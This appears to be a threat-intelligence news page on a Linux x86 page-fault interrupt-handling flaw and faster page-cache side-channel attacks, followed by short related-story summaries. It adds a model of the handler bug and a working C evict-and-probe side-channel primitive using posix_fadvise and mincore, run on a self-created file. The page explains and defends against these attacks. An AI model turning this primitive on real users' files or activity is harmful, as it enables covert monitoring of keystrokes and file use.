
Linux Kernel Research Highlights x86 Page-Fault Interrupt Handling Bug and Faster Page-Cache Side-Channel Attacks

Tags: linux kernel, do_page_fault, side-channel, x86, linux 6.19, page fault, interrupt handling, page cache, cve-2025-21691, cache flush, information leak, logic flaw, gpu ddk, gpu driver, use-after-free
Updated January 25, 2026 at 08:01 AM · 2 sources


Security reporting on the Linux kernel highlighted two separate issues: a long-standing logic flaw in x86 page-fault handling and newly optimized page-cache side-channel techniques. Intel engineer Cedric Xing identified that, since 2020, parts of the x86 do_page_fault() path could leave hardware interrupts enabled where the kernel's logic assumed they were disabled. The root cause was conflating the faulting address range (user vs. kernel) with the execution context the fault came from (user mode vs. kernel mode): a user-mode access to a kernel address is still a user-context fault, and the kernel-address branch was written as if it could never be one. A fix was merged into Linux 6.19, with backports to stable branches planned.
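The following is an added example written for this page, not code from the kernel or from the patch author: a reduced model of the control-flow shape described above, in which faults are dispatched by address range while the interrupt-enable decision depends on execution context. The address split, the handler names and the "fixed" variant are illustrative assumptions, not the upstream constants or the merged fix. It enumerates the four (address range, context) combinations and reports in how many of them the handler returns to its exit path with interrupts still enabled.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical user/kernel address split; a stand-in, not the real
 * architectural constant. */
#define USER_ADDR_LIMIT 0x00007ffffffff000ULL

struct fault {
    uint64_t addr;      /* faulting linear address (what CR2 would hold) */
    bool from_user;     /* privilege level of the faulting code, i.e. user_mode(regs) */
};

/* Simulated CPU interrupt flag as the handler sees it. */
struct cpu { bool irqs_on; };

static bool fault_in_kernel_space(uint64_t addr) { return addr >= USER_ADDR_LIMIT; }

/* Shared "bad area" path: when the *context* is user mode it enables IRQs
 * so a signal can be delivered, whichever address range faulted. */
static void bad_area(struct cpu *c, const struct fault *f) {
    if (f->from_user) c->irqs_on = true;
}

static void user_addr_fault(struct cpu *c, const struct fault *f) {
    if (f->from_user) c->irqs_on = true;  /* may sleep, take locks */
    bad_area(c, f);                       /* pretend no VMA matched */
}

static void kern_addr_fault(struct cpu *c, const struct fault *f) {
    bad_area(c, f);                       /* pretend it was not a vmalloc/spurious fault */
}

/* Buggy shape (modelled): dispatch by address range; only the user-address
 * branch re-disables IRQs afterwards, because the kernel-address branch was
 * assumed never to enable them. Returns true if IRQs are left enabled at
 * the exit path, which expects them off. */
bool handle_fault_buggy(const struct fault *f) {
    struct cpu c = { .irqs_on = false };  /* entered with IRQs disabled */
    if (fault_in_kernel_space(f->addr)) {
        kern_addr_fault(&c, f);
    } else {
        user_addr_fault(&c, f);
        c.irqs_on = false;                /* local_irq_disable() equivalent */
    }
    return c.irqs_on;
}

/* One fixed shape (an assumption, not the upstream patch): restore the
 * entry state on the way out regardless of which address range faulted. */
bool handle_fault_fixed(const struct fault *f) {
    struct cpu c = { .irqs_on = false };
    if (fault_in_kernel_space(f->addr))
        kern_addr_fault(&c, f);
    else
        user_addr_fault(&c, f);
    c.irqs_on = false;
    return c.irqs_on;
}

/* Four constructed faults: (address range) x (execution context).
 * Returns how many of them leave IRQs enabled under the given handler. */
int leaked_irq_cases(bool (*handler)(const struct fault *)) {
    const struct fault cases[] = {
        { 0x00007f0000001000ULL, true  },  /* user addr,   user ctx */
        { 0x00007f0000001000ULL, false },  /* user addr,   kernel ctx (e.g. copy_from_user) */
        { 0xffffffff81000000ULL, false },  /* kernel addr, kernel ctx */
        { 0xffffffff81000000ULL, true  },  /* kernel addr, user ctx: the conflated case */
    };
    int leaked = 0;
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        leaked += handler(&cases[i]) ? 1 : 0;
    return leaked;
}

int main(void) {
    printf("buggy handler leaves IRQs enabled in %d of 4 cases\n",
           leaked_irq_cases(handle_fault_buggy));
    printf("fixed handler leaves IRQs enabled in %d of 4 cases\n",
           leaked_irq_cases(handle_fault_fixed));
    return 0;
}
```

The only case that misbehaves is a user-mode access to a kernel address: the address test routes it down the kernel branch, the shared bad-area code enables interrupts because the context is user mode, and nothing on that branch turns them off again. Any review of a fault or trap handler should check that interrupt-state invariants are keyed on the same thing the code that changes them is keyed on.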

Separately, researchers from Graz University of Technology described significantly faster Linux page-cache attacks, cutting the cache-flush (eviction) step from ~149 ms to ~0.8 µs and allowing evict-and-probe loops of 0.6–2.3 µs. The work describes potential impacts including more precise overlay/keylogging-style attacks, inter-keystroke timing inference, file-activity insights into Docker containers, and user-activity inference in applications such as Discord and Firefox; reporting noted that only CVE-2025-21691 has so far been remediated by the Linux kernel security team. A third item, Imagination Technologies' GPU driver vulnerability bulletin, covers unrelated GPU DDK issues (information-leak and use-after-free-class bugs) and does not pertain to the Linux kernel x86 or page-cache topics.
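To make the attack loop concrete, here is an added example written for this page; it is not the Graz team's code and does not use their optimized flush. It implements the classic page-cache evict-and-probe primitives with calls that exist on Linux: posix_fadvise(POSIX_FADV_DONTNEED) to evict a file page and mmap()+mincore() to test residency without touching the page. The sample file, page count and page indexes are constructed for the demo. Two practitioner caveats are built in: readahead is disabled on the descriptor so that a one-byte victim read does not pull neighbouring pages into the cache, and eviction_works() checks whether DONTNEED actually evicts on the filesystem in use (it does nothing on tmpfs). mincore() reports true residency only for files the caller owns or can write, a hardening added after the 2019 page-cache attacks, which is why the sample file is created by the process itself.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <time.h>
#include <unistd.h>

#define PAGE   4096
#define NPAGES 64   /* constructed sample size */

/* Constructed sample: an unlinked temp file of NPAGES pages, each filled
 * with one letter. Readahead is turned off so that a one-byte read of
 * page N does not drag pages N+1.. into the cache. Returns an fd or -1. */
int make_sample_file(void) {
    char path[] = "/tmp/pagecache_probe_XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) { strcpy(path, "./pagecache_probe_XXXXXX"); fd = mkstemp(path); }
    if (fd < 0) return -1;
    unlink(path);                         /* the open fd keeps it alive */
    unsigned char buf[PAGE];
    for (int i = 0; i < NPAGES; i++) {
        memset(buf, 'A' + (i % 26), PAGE);
        if (pwrite(fd, buf, PAGE, (off_t)i * PAGE) != PAGE) { close(fd); return -1; }
    }
    if (fsync(fd) != 0) { close(fd); return -1; }
    posix_fadvise(fd, 0, 0, POSIX_FADV_RANDOM);   /* disable readahead */
    return fd;
}

/* Probe: is page idx resident? Map it without touching it and ask
 * mincore(); mapping alone does not populate the page. 1/0, -1 on error. */
int probe_resident(int fd, int idx) {
    void *m = mmap(NULL, PAGE, PROT_READ, MAP_SHARED, fd, (off_t)idx * PAGE);
    if (m == MAP_FAILED) return -1;
    unsigned char vec = 0;
    int rc = mincore(m, PAGE, &vec);
    munmap(m, PAGE);
    return rc == 0 ? (vec & 1) : -1;
}

/* Evict: DONTNEED drops only clean, unmapped pages, so write back first.
 * On tmpfs it drops nothing, which eviction_works() below will reveal. */
int evict_page(int fd, int idx) {
    if (fdatasync(fd) != 0) return -1;
    return posix_fadvise(fd, (off_t)idx * PAGE, PAGE, POSIX_FADV_DONTNEED);
}

/* Stand-in for the victim: touch one byte of page idx. */
int touch_page(int fd, int idx) {
    unsigned char b;
    return pread(fd, &b, 1, (off_t)idx * PAGE) == 1 ? 0 : -1;
}

/* Practitioner check: does evict -> probe yield "not resident" here?
 * 1 yes, 0 no (e.g. tmpfs), -1 error. Without this the channel is noise. */
int eviction_works(int fd) {
    if (evict_page(fd, 0) != 0) return -1;
    int r = probe_resident(fd, 0);
    return r < 0 ? -1 : !r;
}

static double now_us(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (double)ts.tv_sec * 1e6 + (double)ts.tv_nsec / 1e3;
}

/* One evict-and-probe round, optionally with a simulated victim access in
 * between. Returns the probe result (1 = access observed) and, if asked,
 * the round's wall time in microseconds; the eviction step dominates it. */
int observe_access(int fd, int idx, int victim_touches, double *round_us) {
    double t0 = now_us();
    if (evict_page(fd, idx) != 0) return -1;
    if (victim_touches && touch_page(fd, idx) != 0) return -1;
    int r = probe_resident(fd, idx);
    if (round_us) *round_us = now_us() - t0;
    return r;
}

int main(void) {
    int fd = make_sample_file();
    if (fd < 0) { perror("sample file"); return 1; }
    printf("eviction works on this filesystem: %d\n", eviction_works(fd));
    double us;
    int seen = observe_access(fd, 5, 1, &us);
    printf("victim touched page 5 -> resident=%d (round %.1f us)\n", seen, us);
    seen = observe_access(fd, 40, 0, &us);
    printf("no victim on page 40 -> resident=%d (round %.1f us)\n", seen, us);
    close(fd);
    return 0;
}
```

Run it on a disk-backed directory and the two rounds print resident=1 and resident=0 respectively; on tmpfs both print 1 and eviction_works() prints 0, which is the signal to pick a different eviction primitive. The round time it prints is the figure the Graz work drives down: the eviction step, not the probe, is what made earlier loops run in the hundred-millisecond range.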

Related Stories

Linux Cloud Threats: eBPF/io_uring Rootkits and VoidLink Malware Targeting Containers

Security research highlighted a continued shift in attacker tradecraft toward **Linux cloud and container environments**, with stealth-focused malware increasingly abusing modern kernel capabilities. Elastic Security Labs documented the evolution of Linux rootkits from userland hijacking and LKM implants to newer generations that leverage **eBPF** and **io_uring** for stealth and evasion, citing examples including **TripleCross**, **Boopkit**, and **RingReaper**. Separately, reporting on **VoidLink** described a cloud-native malware framework designed to operate inside Linux workloads, detect whether it is running in major cloud providers and in **Docker/Kubernetes**, and adapt its behavior to remain persistent while harvesting sensitive material such as cloud metadata and credentials. Operationally, the same kernel features and observability gaps being leveraged by attackers are also driving defensive tooling improvements. Trail of Bits released *mquire*, an open-source Linux memory forensics tool intended to reduce dependency on external debug symbols by extracting structure and symbol information directly from memory using **BPF Type Format (BTF)** and **Kallsyms** (e.g., `/proc/kallsyms`-style data), then exposing findings through an interactive **SQL** query interface. While *mquire* is not tied to a single named campaign, it is directly relevant to investigating advanced Linux threats (including kernel-level implants and stealthy cloud malware) by enabling more reliable post-compromise analysis of Linux memory dumps across kernel versions.

1 week ago

Linux Kernel Adds PCIe Link Encryption Amid Disclosure of PCIe IDE Vulnerabilities

The Linux kernel is introducing support for PCI Express (PCIe) Link Encryption in version 6.19, a feature developed collaboratively by Intel, AMD, and Arm to enhance the security of cloud server infrastructure. This new capability leverages certificates and keys to encrypt data transmitted between CPUs and hardware components over PCIe, aiming to prevent unauthorized devices from intercepting sensitive information. The encryption protocol, known as Integrity and Data Encryption (IDE), is managed through a Trusted Execution Environment (TEE) Security Manager, providing an additional layer of protection for cloud providers against hardware-based attacks. Concurrently, three significant vulnerabilities have been disclosed in the PCIe IDE protocol, affecting PCIe Base Specification Revision 5.0 and later. These flaws—CVE-2025-9612, CVE-2025-9613, and CVE-2025-9614—could allow local attackers to reorder traffic, redirect completion timeouts, or inject stale data, potentially leading to information disclosure, privilege escalation, or denial of service. While these vulnerabilities require physical or low-level access to exploit, they highlight the ongoing challenges in securing PCIe communications, even as new encryption features are being integrated into major operating systems like Linux.

3 months ago
Intel CPU Vulnerability CVE-2025-20109 Advisory and Downstream Vendor Impact

**Intel** published security advisories on March 10, 2026 covering vulnerabilities across multiple products, prompting the Canadian Centre for Cyber Security to recommend reviewing Intel’s guidance and applying mitigations and updates. In parallel, **F5** issued a product security advisory for **CVE-2025-20109**, an **Intel CPU vulnerability**, indicating potential downstream impact to vendors whose appliances or platforms rely on affected Intel processors. Separate from the Intel CPU issue, the Canadian Centre for Cyber Security also relayed routine upstream patch activity from **Ubuntu** and **Red Hat** between March 2–8, 2026, including **Linux kernel** security updates across multiple supported releases and platforms. These Linux distribution advisories are not specific to CVE-2025-20109 and should be tracked as independent patching items for organizations running affected Ubuntu LTS versions and Red Hat Enterprise Linux variants.

6 days ago

Get Ahead of Threats Like This

Mallory continuously monitors global threat intelligence and correlates it with your attack surface. Know if you're exposed — before adversaries strike.